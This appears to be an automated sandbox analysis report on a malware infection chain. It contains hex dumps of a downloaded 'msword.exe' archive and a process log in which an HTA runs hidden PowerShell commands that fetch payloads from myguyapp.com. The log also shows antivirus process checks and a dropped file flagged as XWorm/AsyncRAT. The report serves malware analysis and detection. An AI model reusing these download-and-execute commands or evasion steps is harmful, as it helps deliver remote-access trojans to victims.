                                                                          2024-12-12 18:07:18 UTC7907INData Raw: 50 4b 03 04 14 00 00 00 08 00 05 ab 5c 59 89 46 99 25 0d 05 3a 00 f7 ff 1f 35 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 8a 40 c9 39 fc 68 89 26 9c a4 b2 1e d6 5a 6b 6f b5 b5 b7 a6 d8 5b db da 4a 5b 2b 51 11 13 40 12 94 5a 14 2e a6 05 af 11 a9 ce ba 51 57 89 61 81 c8 f9 bc 9f 99 dd 10 b8 b6 bd 9f cf eb 7e ff fb 06 67 cf 9c 39 cf cc 3c f3 cc f3 73 66 ce d1 7f fb 23 92 4d 92 24 3b 92 69 4a 52 8b 24 fe 7c d2 bf fe db 8f 34 e4 d2 97 86 48 cf 0f fe f3 65 2d 96 d9 7f be ec 36 65 59 6d f1 aa d5 2b ef 59 7d e7 7d c5 77 df b9 62 c5 4a b5 f8 ae a5 c5 ab b5 15 c5 cb 56 14 97 df 12 2c be 6f e5 92 a5 13 f3 f2 72 4a d2 6d 4c ff ce 5b f7 66 5d
                                                                          Data Ascii: PK\YF%:5msword.exe|T?~GlE4BP.(qAf*@9h&Zko[J[+Q@Z.QWa~g9<sf#M$;iJR$|4He-6eYm+Y}}wbJV,orJmL[f]
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 56 85 d9 33 a3 08 bd c4 85 18 67 11 1f e7 f7 bf ca 60 3f 48 ff d4 ea 3d 51 fb 77 9a 66 52 54 de 13 ab 57 f0 78 9b 1c 75 f6 d1 78 be 62 7e 75 1a e1 bb c7 d0 e6 33 3f 2e 32 0f 59 b0 84 5b cf 7b 96 d4 20 bb f7 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 27 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 d3 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 58 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 56 42 67 31 88 c3 1c ab 70 fb 02 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 c4 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 53 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec df 30 51 de d7 d4 dc b4 24 11 09 6a cc 2c ea f0 16 ed 89 aa 20 fb 19 aa c5 cf 80 39 ca 26 d0 2a a6 fa 9d 88 8d 5d 0a ce 8e d8 8d 4e
                                                                          Data Ascii: V3g`?H=QwfRTWxuxb~u3?.2Y[{ -wbYT(W'-mq<f46h4(c0+XrRj&Zn%W$NVBg1pn#-Csk1)axqARfSU!vTT+j0Q$j, 9&*]N
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: ce 1d 83 46 b1 f2 54 b9 9e 4e 71 9d 6a 2d c6 ef 7d 69 7c 91 bb 91 53 be 42 e2 a3 03 11 c3 d0 d7 54 67 d7 39 17 bf 9a 5d fc b1 33 24 71 6a fb 4b 5f c6 9d a8 e2 12 63 c5 15 f3 ae 6b e7 1f 75 09 73 5d ba f8 d1 66 78 27 b5 6f 51 22 07 81 9c b6 b7 53 ae 42 ab 7a 20 3f 20 f1 0d e7 5c d9 fc 1d b7 b3 6b dc f3 5f fb 37 39 03 57 ac 2a de 97 de 5a 52 d0 5d 63 6a b8 58 3f 56 7e 35 6d 1b 3e 81 2f d0 8f 48 d4 da 3e d5 be 5e af b5 7a 3a ed 75 f8 93 6d 8e 1a c4 5f 82 9f 2b dc a2 3c 43 f2 a4 30 47 b4 8d ef 8e 9a db dd d1 11 df 1e cd 9f d3 1d 2c b9 39 62 7e 2c 36 8b c6 20 79 fb 8e d6 e1 a6 09 a5 15 4b 3d 58 c2 8f 8a cf 46 77 2b 8a 1b c0 75 39 1d a3 e5 ee e9 bc 1a e2 7c 1e 5c cd c0 74 7c cf 83 1f 6e b5 41 2b df 1c 0c 8a 3b 38 be 04 47 92 17 7d f5 df 1e 74 b3 3a 75 43 b0 cb
                                                                          Data Ascii: FTNqj-}i|SBTg9]3$qjK_ckus]fx'oQ"SBz ? \k_79W*ZR]cjX?V~5m>/H>^z:um_+<C0G,9b~,6 yK=XFw+u9|\t|nA+;8G}t:uC
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 93 60 7c 07 2b fd 2b 71 34 1d 1b b7 95 de 6d a8 d1 45 6c d2 7d 90 60 6e e4 d0 fb 59 98 e6 a7 b1 47 af bd f9 91 fe 7d 93 c8 34 a3 7c be bf a9 8b e0 f0 58 d4 f2 63 e3 a6 12 a8 49 60 db 1d 05 fc c4 df 2a bd 75 cf ac e2 8b fa 54 55 91 f5 75 4a 85 a3 44 b9 d4 d2 df 9e 3d d6 cd 4c 30 ac fb 65 88 e8 ad 62 79 9f a3 cd 1e 80 b5 f8 1f 45 c5 2b 26 1f 64 d8 20 21 74 57 6d 68 8f 70 29 c2 c6 ab b6 e7 02 62 d2 9c 41 27 59 c6 f9 52 39 04 51 f6 1c f1 aa c7 58 a5 18 64 48 94 0d 13 56 b6 cd dd 60 ca 70 40 85 2e 96 d0 d5 85 d1 d5 45 d1 d5 69 5c 18 3c 58 66 c8 26 32 38 33 21 96 0b 85 f1 a9 00 4b a9 44 51 92 2d b8 8a 4d 8a ee 7b b3 8e 22 16 09 ea 03 29 00 79 83 c1 1a e8 5a 23 7c 42 78 25 67 e3 63 15 6c 06 58 47 e9 95 97 25 f1 f3 35 5e 21 c7 09 0d d9 56 cf 71 54 84 a3 02 70 1f
                                                                          Data Ascii: `|++q4mEl}`nYG}4|XcI`*uTUuJD=L0ebyE+&d !tWmhp)bA'YR9QXdHV`p@.Ei\<Xf&283!KDQ-M{")yZ#|Bx%gclXG%5^!VqTp
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: f9 b4 5f c7 58 37 b2 67 8f bf fc 08 56 d9 81 6d 04 63 79 f0 2f 7b 2a e2 2c 53 ba 09 64 06 3e e1 91 2b 5a b9 98 92 50 bd 80 bc 92 de 2e 1d 0e 07 79 b2 c7 6e d3 46 d8 40 cc c7 5d c4 77 de 35 60 24 4e bc f5 c9 0a 16 61 c5 65 0a b5 e3 18 3e 51 b0 5a 90 14 d8 10 95 c8 8e f9 c5 63 43 c0 f3 c4 b6 8e aa 13 af 9f fd e8 35 9e 21 ef 3b d1 ed 88 4e 48 44 70 57 27 1b bd 2f 9b 5e df de 69 aa 7e 00 da f6 8a 45 91 be ee 3c e7 2c 1b f1 d4 ff 4b 16 df 42 5b 5b 11 fe 91 e5 3b 55 46 34 6f b0 f0 e5 54 e4 42 70 d6 b9 c3 a8 d0 fe 4e f9 e3 11 75 34 1f c6 99 aa 3a c2 a5 fe 6c bc c6 f8 35 8d 62 01 ec 3a 9e 96 cb 81 6c 73 cb aa 34 29 f3 15 3d 34 a5 ea 29 97 56 6a 41 c2 c4 6e 9a 10 26 a2 e6 1c d6 f3 28 b0 dd ae b1 17 67 1d be 89 c2 e6 81 54 bc 6f bf 81 7a b6 bc f5 5f 9d b5 15 da a6
                                                                          Data Ascii: _X7gVmcy/{*,Sd>+ZP.ynF@]w5`$Nae>QZcC5!;NHDpW'/^i~E<,KB[[;UF4oTBpNu4:l5b:ls4)=4)VjAn&(gToz_
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 53 2f 24 2c 11 25 a5 75 42 9f ba 65 2a d8 59 b6 9f cc 8b 06 bd f4 bf c0 72 ed 69 97 5c 2f 66 35 40 2e fe d0 44 fa f3 fa 15 f1 98 0f d6 3f 75 25 87 af 9f 71 cb f4 65 55 36 b3 0f e4 bf 16 3e eb bd a2 a1 03 88 6c 47 de 8d 16 85 a2 03 f7 ea 0f d2 5d 3f 05 6b 75 52 03 76 4e 82 9f 7e 8f 25 f8 1b f6 a6 15 d7 0f ae 56 fb 1c 4b fe ca 9d d1 30 87 8c 5a e8 01 71 87 3b 38 62 22 82 11 dd cd c6 85 a7 b5 d0 9c 81 9c a4 08 49 9e 31 d7 37 84 71 67 85 4f 60 56 e9 cc a0 3d 3d 35 a8 31 c8 46 87 2c 07 4a 29 9b 06 f5 76 de 9a 00 75 bf 82 68 9e 96 1c 0b b5 61 e2 42 2b 44 8f 6b af 55 7d 7b 09 70 cb 22 60 53 f1 50 ca 93 e8 e1 d5 af 35 50 d9 28 8b 73 1f 21 20 ac 06 42 0c c4 07 34 43 32 c4 d0 8e 5c 88 8d 58 fb e2 99 f7 e5 23 5c dc f7 13 4c b1 d2 cd e0 c7 f6 d3 e9 e6 6b be 26 87 ec
                                                                          Data Ascii: S/$,%uBe*Yri\/f5@.D?u%qeU6>lG]?kuRvN~%VK0Zq;8b"I17qgO`V==51F,J)vuhaB+DkU}{p"`SP5P(s! B4C2\X#\Lk&
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: b6 88 82 7a 44 8a 25 9b 38 0b 1b f5 8b 83 6d c3 42 b2 f4 78 a4 ee ab 2a 25 99 99 79 af ec e9 c5 ef 7b fc d7 0c 94 83 97 24 f9 7e 7f d8 f2 a8 0a f4 9c 72 0c 7b 79 7f f1 51 5f d1 83 82 b4 21 fa e3 93 7c 8f 83 26 14 95 cf 3d 37 4d 61 71 af fe c7 50 41 e9 f1 17 08 7f b3 42 c1 d3 d5 c3 69 77 27 64 7b bd ba 3b 45 8a 05 d2 e0 c0 0d b2 a6 7b 97 59 3f da ae 1a 6c 81 46 e0 da 93 fe d4 36 57 0d b2 14 1a d3 65 01 f5 28 5b d6 ed a9 65 73 a6 bd f2 bf c3 ef ba 4b 95 a3 8d df 42 92 a0 40 3d 81 1e 42 bc 0c 5c af f1 42 0b 98 1a 04 4d 4a 92 38 f1 c0 3b 4d e0 5e 14 08 fc 68 bf b1 1e 80 cb 6a ef 3f e6 20 5a 09 01 86 c5 10 28 38 0a 29 08 dd 5a be 5b f5 19 86 b2 a7 b7 06 5c 10 f7 8d a1 07 f9 17 5f 08 af 48 4c 3f 41 89 41 08 6c 98 a7 a8 00 0d cd ac 7f 10 82 d3 b8 ce 5c 06 79 b2
                                                                          Data Ascii: zD%8mBx*%y{$~r{yQ_!|&=7MaqPABiw'd{;E{Y?lF6We([esKB@=B\BMJ8;M^hj? Z(8)Z[\_HL?AAl\y
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 0d c6 fc 81 53 e3 a2 bb ae ce bd 5a 7f 5b 5c 40 7f a4 29 1f 32 7c 35 25 f2 e4 f9 73 14 63 6b a7 6f 26 45 9f ac 2d 4e 76 27 44 7f 9a cf 2a 7a 76 df e8 f2 8b 34 86 cf c7 34 60 55 3f 8f f3 7d 7d 57 67 ea 5b 28 4b 6e ae fb e2 e7 29 e7 c7 75 ae e9 97 7b be 54 d2 d5 31 8b 00 89 f5 5b 3a 35 32 b1 69 0d 8c 07 bc a3 68 62 88 f7 ee f5 88 0f e6 fa 11 df 44 e2 51 cd 63 ee 28 02 5d e0 27 be 1a 34 04 f0 2c fb 7c 9e f8 46 bb bc e1 db db 7d d1 0c ff 21 60 68 46 a4 2c b6 b8 6d fa d7 48 45 67 c0 d4 8c d9 ac 43 d9 80 0f 97 b7 da b4 db 10 92 43 1a ef 47 f1 71 f4 89 9a 59 78 d5 f0 b6 f4 60 e2 58 78 81 d4 23 61 71 fe c6 10 f7 fc f4 87 ed 67 b5 03 93 4f 2f 8c e6 1f 8e bd a0 cf 2c c0 4d 54 1f 61 2c 28 89 ba 24 6a a8 91 f4 d9 3a 4b f6 aa f5 31 8a dd 86 92 a2 97 f4 b5 0a eb c4 b6
                                                                          Data Ascii: SZ[\@)2|5%scko&E-Nv'D*zv44`U?}}Wg[(Kn)u{T1[:52ihbDQc(]'4,|F}!`hF,mHEgCCGqYx`Xx#aqgO/,MTa,($j:K1
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 37 49 78 13 37 5e b4 97 60 2a e6 0d b2 bc 19 67 ec 3b 9a 45 a7 cc 50 dd ac 3d cd 84 e9 05 95 5d 2e 3c 66 6f 26 74 9f 5f e6 43 1a f7 23 70 b6 bd 31 c0 63 c9 0d 3f 5f c9 49 6f e7 fb 36 b9 30 bf 52 fd 63 65 c3 c9 4c 07 da a0 07 70 6c 9c 10 96 81 c9 86 58 bb 8e 6a 0d 54 f3 1e 6c 48 61 77 97 72 cf a1 57 cb df 5e 5a 05 5d 04 66 6c a1 3c 3b 68 a8 99 88 0a 4a c9 65 38 95 2b d7 82 1c ee 96 eb f6 c2 b8 53 4b 76 71 23 1c 2e 7f a6 10 31 ac b9 00 1d b7 33 a4 fc dd d5 4e 7e e9 e1 cd 46 52 d4 25 c4 8c 7f 06 93 ca ee 14 8c 8c 9b 69 d8 27 91 4f e0 46 c5 05 04 aa ab 17 37 00 dd c6 a4 66 6e d1 56 36 90 14 75 76 b5 0b b3 a2 a4 29 30 94 08 43 60 53 c4 c4 db 52 2f 14 c9 60 11 ae 5a ce 2c ec 33 cc fd e7 10 de 0a 19 46 bd 02 b1 9c f9 f2 45 97 8a 9d 48 57 48 21 64 44 53 0c c2 c2
                                                                          Data Ascii: 7Ix7^`*g;EP=].<fo&t_C#p1c?_Io60RceLplXjTlHawrW^Z]fl<;hJe8+SKvq#.13N~FR%i'OF7fnV6uv)0C`SR/`Z,3FEHWH!dDS
                                                                          2024-12-12 18:07:19 UTC16384INData Raw: 8e c6 84 cc 36 53 d4 04 f9 57 bb cf dc ae 21 91 54 31 d2 b4 f8 b0 99 26 e7 00 e5 1d ee 47 32 48 4f 22 f1 fd 0e 26 ca 1c 35 53 bc 5a ba 4b 23 61 90 cd ec 16 74 77 9b 62 30 30 da f1 2a 0a d8 92 a2 27 f4 bd cc ee ed 9b 74 f5 54 82 a2 d1 79 26 a2 0b 05 91 0d a8 fb 22 01 6a 8a 78 92 72 82 e0 dc a8 f3 fc d5 0a 40 d6 a9 7e fe 0c c3 d8 ac 8a 35 d6 cf 36 f8 56 e8 8c 34 8c 0b e3 a5 e7 26 fe fc af 1b 5c d7 95 5e 4f 41 7c 6c b1 fe db 60 47 fb 4e 8f fe fb 7d 6c 90 c5 c5 32 f5 f5 78 7e da d0 7e 80 d4 ad 27 b1 d4 53 a7 29 34 ad 46 42 cc af 15 28 9d c2 d0 7e 2e be d9 fb 32 de 6f 28 92 22 70 41 26 b5 a8 36 5f f7 a8 e6 cb 84 ac 31 2b 55 13 8e fc 05 ad 53 a2 18 08 be a3 3a 34 87 94 12 12 1a fb ea ed 74 ad a6 19 2d fa ae 0c 33 50 1c 04 51 1e 18 11 b2 94 05 49 1e 9b 81 6d 95
                                                                          Data Ascii: 6SW!T1&G2HO"&5SZK#atwb00*'tTy&"jxr@~56V4&\^OA|l`GN}l2x~~'S)4FB(~.2o("pA&6_1+US:4t-3PQIm


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:13:07:06
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                          Imagebase:0xb90000
                                                                          File size:13'312 bytes
                                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:13:07:09
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:13:07:13
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
                                                                          Imagebase:0x7ff6e8200000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:7
                                                                          Start time:13:07:13
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:13:07:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:13:07:14
                                                                          Start date:12/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:13
                                                                          Start time:13:07:24
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                          Imagebase:0x6e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:msword.exe
                                                                          Imagebase:0x400000
                                                                          File size:891'289'591 bytes
                                                                          MD5 hash:C744E054E4EF01832BBF43B81D397B61
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:13:07:55
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 90
                                                                          Imagebase:0xc40000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:13:07:56
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:13:07:57
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:23
                                                                          Start time:13:07:57
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "wrsa opssvc"
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:24
                                                                          Start time:13:07:58
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:25
                                                                          Start time:13:07:58
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:26
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c md 220239
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:27
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /V "DimPieLilHot" Statistical
                                                                          Imagebase:0xb30000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:28
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:29
                                                                          Start time:13:07:59
                                                                          Start date:12/12/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\220239\Carter.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:Carter.pif F
                                                                          Imagebase:0x270000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
